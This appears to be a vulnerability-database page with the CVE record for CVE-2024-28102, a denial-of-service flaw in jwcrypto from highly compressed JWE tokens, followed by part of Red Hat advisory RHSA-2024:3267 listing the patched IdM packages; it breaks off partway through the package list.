Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-28102 (GCVE-0-2024-28102)
Vulnerability from cvelistv5
- CWE-770 - Allocation of Resources Without Limits or Throttling
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-09T13:06:44.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"lessThan": "1.5.6",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-28102",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-02T19:56:39.446407Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-02T20:03:10.383Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-03-06T21:09:58.064Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
}
],
"source": {
"advisory": "GHSA-j857-7rvv-vj97",
"discovery": "UNKNOWN"
},
"title": "JWCrypto vulnerable to JWT bomb Attack in `deserialize` function"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-28102",
"datePublished": "2024-03-06T21:09:58.064Z",
"dateReserved": "2024-03-04T14:19:14.058Z",
"dateUpdated": "2024-09-09T13:06:44.240Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-28102\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-03-21T02:52:23.513\",\"lastModified\":\"2024-11-21T09:05:49.187\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.\"},{\"lang\":\"es\",\"value\":\"JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"references\":[{\"url\":\"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"name\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"name\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103\"}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-09-09T13:06:44.240Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-28102\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-02T19:56:39.446407Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*\"], \"vendor\": \"latchset\", \"product\": \"jwcrypto\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.5.6\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-02T20:03:05.042Z\"}}], \"cna\": {\"title\": \"JWCrypto vulnerable to JWT bomb Attack in `deserialize` function\", \"source\": {\"advisory\": \"GHSA-j857-7rvv-vj97\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"latchset\", \"product\": \"jwcrypto\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.6\"}]}], \"references\": [{\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"name\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"name\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-03-06T21:09:58.064Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-28102\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-09T13:06:44.240Z\", \"dateReserved\": \"2024-03-04T14:19:14.058Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-03-06T21:09:58.064Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
RHSA-2024:3267
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the idm:DL1 and idm:client modules is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. \n\nSecurity Fix(es):\n\n* JWCrypto: denail of service Via specifically crafted JWE (CVE-2023-6681)\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:3267",
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "RHEL-28842",
"url": "https://issues.redhat.com/browse/RHEL-28842"
},
{
"category": "external",
"summary": "RHEL-29908",
"url": "https://issues.redhat.com/browse/RHEL-29908"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_3267.json"
}
],
"title": "Red Hat Security Advisory: idm:DL1 and idm:client security update",
"tracking": {
"current_release_date": "2025-09-25T13:10:24+00:00",
"generator": {
"date": "2025-09-25T13:10:24+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.8"
}
},
"id": "RHSA-2024:3267",
"initial_release_date": "2024-05-22T11:47:22+00:00",
"revision_history": [
{
"date": "2024-05-22T11:47:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-22T11:47:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-09-25T13:10:24+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product": {
"name": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client)",
"product_id": "ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm (idm:client)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client)",
"product_id": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client)",
"product_id": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"product": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm (idm:DL1)",
"product_id": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1)",
"product_id": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1)",
